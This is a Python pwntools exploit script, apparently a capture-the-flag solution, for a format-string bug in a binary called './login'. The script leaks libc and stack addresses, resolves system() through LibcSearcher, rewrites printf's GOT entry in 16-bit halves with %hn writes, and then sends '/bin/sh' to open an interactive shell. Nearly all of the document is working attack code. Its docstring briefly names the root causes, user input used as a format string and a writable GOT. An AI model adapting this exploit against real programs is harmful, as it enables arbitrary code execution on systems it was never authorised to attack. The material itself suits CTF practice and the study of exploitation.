"""Format-string exploit for the CTF binary ./login.

The binary evidently passes the user-supplied password to a printf-style
function as the format argument: the `%15$p` / `%6$p` reads below only yield
pointers, and the `%N$hn` writes only land, if user input is the format
string.  The script leaks a libc address, resolves system() through
LibcSearcher, and then uses half-word (`%hn`) writes to point the GOT entry
noted at the bottom of the file at system().  The second half of that attack
only succeeds while the GOT is writable; from a defender's view the two
root causes are user input reaching a format argument and a GOT that is not
read-only (full RELRO).
"""
from pwn import *
from LibcSearcher import *

io = process('./login')
elf = ELF('./login')
# gdb.attach(io,'b *0x080485AA')


def change(n: int, k: int) -> None:
    """Send one format-string write: emit n characters, then `%k$hn`.

    `%<n>c` pads the output to n bytes, and `%<k>$hn` stores the number of
    bytes printed so far as a 16-bit value at the address held in stack
    slot k.  The binary re-prompts with 'Try again!' after each attempt,
    which is what every call here synchronises on.
    """
    payload = '%'+str(n)+'c%'+str(k)+'$hn'
    io.sendlineafter('Try again!\n',payload)


io.sendlineafter('your name: \n','admin')
# The password is the format string.  `%15$p` leaks a libc pointer
# (treated below as a return address inside __libc_start_main) and `%6$p`
# leaks a stack address; AAAA/BBBB delimit the two values in the output.
io.sendlineafter('password: \n','AAAA%15$pBBBB%6$p')
io.recvuntil('AAAA')
# recv(10) expects the form 0x12345678 (a 32-bit pointer).  Subtracting 247
# is the assumed distance from the leaked return address back to the
# __libc_start_main symbol; that constant is specific to one libc build.
__libc_start_main = int(io.recv(10),16) - 247
# Identify the libc build from the leaked symbol address, then derive the
# libc base (`offset`) and the absolute address of system().
libc = LibcSearcher('__libc_start_main',__libc_start_main)
offset = __libc_start_main - libc.dump('__libc_start_main')
success(hex(offset))
system = offset + libc.dump('system')
success(hex(system))
io.recvuntil('BBBB')
# Stack address leaked from slot 6.  hex(p)[2:6] is its high 16 bits and
# hex(p)[6:10] its low 16 bits (assumes exactly eight hex digits).
p = int(io.recv(10),16)
# Stage 1: turn two stack slots into pointers at the GOT entry 0x0804b014
# and at its upper half 0x0804b016 (see the trailing note in this file).
# Slot 6 holds p, so `%6$hn` rewrites the low 16 bits of the word *at* p.
# The -12 / +4 deltas and the use of slots 7 and 11 afterwards imply that p
# is the address of slot 10 and that p-12 / p+4 are slots 7 / 11 on this
# 32-bit stack -- inferred from the offsets, not shown here.
change(int(hex(p)[6:10],16)-12,6)
change(int('b014',16),10)
change(int(hex(p)[6:10],16)+4,6)
change(int('b016',16),10)
# Stage 2: write system() into the GOT entry in two 16-bit halves, the low
# half through slot 7 and the high half through slot 11.  The second `%c`
# width is the increment over the first because printf's byte count is
# cumulative within one call.
addr1=int(hex(system)[6:10],16)
addr2=int(hex(system)[2:6],16)
payload = '%'+str(addr1)+'c%7$hn'+'%'+str(addr2-addr1)+'c%11$hn'
io.sendlineafter('Try again!\n',payload)
# With the GOT entry redirected, the next input string reaches system() as
# its argument.
io.sendlineafter('Try again!\n','/bin/sh\x00')
io.interactive()
# 6 7 10 11 15 #printf_got:0x0804b014